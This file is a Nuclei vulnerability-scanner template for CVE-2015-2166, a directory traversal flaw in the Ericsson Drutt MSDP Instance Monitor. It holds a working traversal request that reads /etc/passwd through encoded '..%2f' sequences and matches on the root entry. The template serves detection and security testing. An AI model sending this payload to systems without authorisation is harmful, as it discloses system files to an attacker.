nuclei-templates/cves/2015/CVE-2015-2166.yaml

28 lines
830 B
YAML

id: CVE-2015-2166
info:
name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
reference:
- https://www.exploit-db.com/exploits/36619
- https://nvd.nist.gov/vuln/detail/CVE-2015-2166
tags: cve,cve2015,lfi,ericsson
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: status
status:
- 200